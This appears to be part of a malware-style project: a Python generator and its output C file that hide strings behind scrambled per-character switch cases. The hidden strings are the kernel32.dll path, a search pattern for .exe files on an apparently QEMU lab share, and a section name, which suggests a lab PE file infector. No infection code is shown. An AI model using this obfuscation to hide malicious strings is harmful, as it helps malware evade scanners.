File: scripts/string_generator.py
#!/usr/bin/env python3

import argparse
import os
import string
import logging
import random

import util

def read_words(filename):
    words = {}
    with open(filename, "r") as f:
        lines = f.readlines()
        word_id = 0
        for line in lines:
            word_symbol, word_value = line[:-1].split(" ", maxsplit = 1)
            if word_symbol.upper() in words:
                print("Symbol clash: " + word_symbol.upper())
                return {}
            words[word_symbol.upper()] = (word_id, word_value)
            word_id += 1
    return words

def generate_alphabet_map(word_map):
    alphabet = {}
    for word_symbol in word_map:
        for (i, c) in enumerate(word_map[word_symbol][1]):
            num = word_map[word_symbol][0] | (i << 8)
            if c in alphabet:
                alphabet[c].append(num)
            else:
                alphabet[c] = [num]
    return alphabet

def generate_function_get_word_length(word_map):
    code = "size_t get_string_length(uint16_t id) {\n"
    code += "switch(id) {\n"
    for word_symbol in word_map:
        code += f"case STRING_{word_symbol}: return {len(word_map[word_symbol][1])};\n"
    code += "default: return 0;\n}}"
    return code

def generate_function_generate_word(occurence_map):
    code = "size_t get_string(uint16_t id, char * dest, size_t dest_size) {\n"
    code += "size_t len = get_string_length(id);\n"
    code += "if (len == 0 || len >= dest_size) { return 0; }\n"
    code += f"for(size_t index = 0; index < len; index++) {{\n"
    code += generate_switch(occurence_map)
    code += "}\ndest[len] = 0;\n return len + 1;\n}"
    return code

def generate_switch(alphabet_map):
    code = ""
    code += "switch(id | (((uint16_t)index) << 8)) {\n"

    alphabet = list(alphabet_map.keys())
    random.shuffle(alphabet)
    for c in alphabet:
        for v in alphabet_map[c]:
            code += f"case {v}: "
        if c == "\\":
            c = "\\\\"
        code += f"dest[index] = '{c}'; break;\n"
    code += "default: return 0;\n}\n"
    return code

def generate_header_code(filename, word_map):
    code = "#include <stdint.h>\n\n"
    for word_symbol in word_map:
        code += f"#define STRING_{word_symbol} ({word_map[word_symbol][0]}) // {word_map[word_symbol][1]}\n"
    code += "\nsize_t get_string_length(uint16_t id);\n"
    code += "\nsize_t get_string(uint16_t id, char * dest, size_t destSize);\n"
    return util.safeguard_code(code, filename)

def generate_source_code(header_name, word_map):
    alphabet_map = generate_alphabet_map(word_map)
    logging.getLogger().info(f"Alphabet size: {len(alphabet_map)}")
    code = f"#include \"{header_name}\"\n#include \"functions.h\"\n#include \"utility.h\"\n\n"
    code += generate_function_get_word_length(word_map)
    code += "\n\n"
    code += generate_function_generate_word(alphabet_map)
    return code

if __name__ == "__main__":
    util.setup_logger()
    logger = logging.getLogger()

    parser = argparse.ArgumentParser("Generates a word generator in form of a C header and source file.")

    parser.add_argument("--string-file",
        metavar = "FILE",
        help = "Specify the file containing the strings which should be possible to generate.",
        required = True)
    parser.add_argument("--header-path",
        metavar = "DIR",
        help = "Specify the header path",
        required = True)
    parser.add_argument("--source-path",
        metavar = "DIR",
        help = "Specify the source path",
        required = True)
    args = parser.parse_args()

    HEADER_NAME = os.path.basename(args.header_path)

    word_map = read_words(args.string_file)
    logger.info(f"Word amount: {len(word_map)}")

    header_code = generate_header_code(HEADER_NAME, word_map)
    source_code = generate_source_code(HEADER_NAME, word_map)

    with open(args.header_path, "w") as f:
        f.write(header_code)
        logger.info(f"Generated {args.header_path}")

    with open(args.source_path, "w") as f:
        f.write(source_code)
        logger.info(f"Generated {args.source_path}")

File: src/string_generator.c
#include "string_generator.h"

size_t get_string_length(uint16_t id) {
    switch (id) {
    case STRING_KERNEL32_PATH:
        return 32;
    case STRING_EXE_SEARCH_PATTERN:
        return 28;
    case STRING_SECTION_NAME:
        return 6;
    default:
        return 0;
    }
}

size_t get_string(uint16_t id, char *dest, size_t dest_size) {
    size_t len = get_string_length(id);
    if (len == 0 || len >= dest_size) {
        return 0;
    }
    for (size_t index = 0; index < len; index++) {
        switch (id | (((uint16_t)index) << 8)) {
        case 5632:
        case 4609:
            dest[index] = 'r';
            break;
        case 1792:
        case 1282:
            dest[index] = 'o';
            break;
        case 256:
            dest[index] = ':';
            break;
        case 2817:
            dest[index] = 'q';
            break;
        case 3840:
        case 5376:
        case 6144:
        case 3073:
        case 5121:
        case 6401:
        case 6913:
        case 514:
            dest[index] = 'e';
            break;
        case 769:
        case 1281:
            dest[index] = '0';
            break;
        case 3072:
            dest[index] = 'y';
            break;
        case 1280:
        case 5888:
            dest[index] = 'n';
            break;
        case 7168:
        case 1025:
        case 1537:
        case 2049:
        case 6145:
        case 2:
            dest[index] = '.';
            break;
        case 3585:
            dest[index] = 'u';
            break;
        case 0:
            dest[index] = 'c';
            break;
        case 5120:
            dest[index] = 'k';
            break;
        case 2304:
        case 2816:
        case 3328:
            dest[index] = 's';
            break;
        case 4865:
            dest[index] = 'g';
            break;
        case 258:
            dest[index] = 'h';
            break;
        case 3584:
        case 4097:
        case 5377:
            dest[index] = 't';
            break;
        case 4352:
        case 6656:
            dest[index] = '3';
            break;
        case 512:
        case 2560:
        case 4864:
        case 1:
        case 257:
        case 2561:
        case 3841:
        case 5633:
            dest[index] = '\\';
            break;
        case 2305:
            dest[index] = '4';
            break;
        case 4608:
        case 6912:
        case 1793:
            dest[index] = '2';
            break;
        case 4353:
            dest[index] = 'a';
            break;
        case 6657:
            dest[index] = 'x';
            break;
        case 6400:
        case 7680:
        case 7936:
        case 770:
        case 1026:
            dest[index] = 'l';
            break;
        case 1536:
        case 7424:
            dest[index] = 'd';
            break;
        case 768:
        case 2048:
            dest[index] = 'w';
            break;
        case 4096:
        case 3329:
            dest[index] = 'm';
            break;
        case 1024:
            dest[index] = 'i';
            break;
        case 5889:
            dest[index] = '*';
            break;
        case 513:
            dest[index] = '1';
            break;
        default:
            return 0;
        }
    }
    dest[len] = 0;
    return len + 1;
}
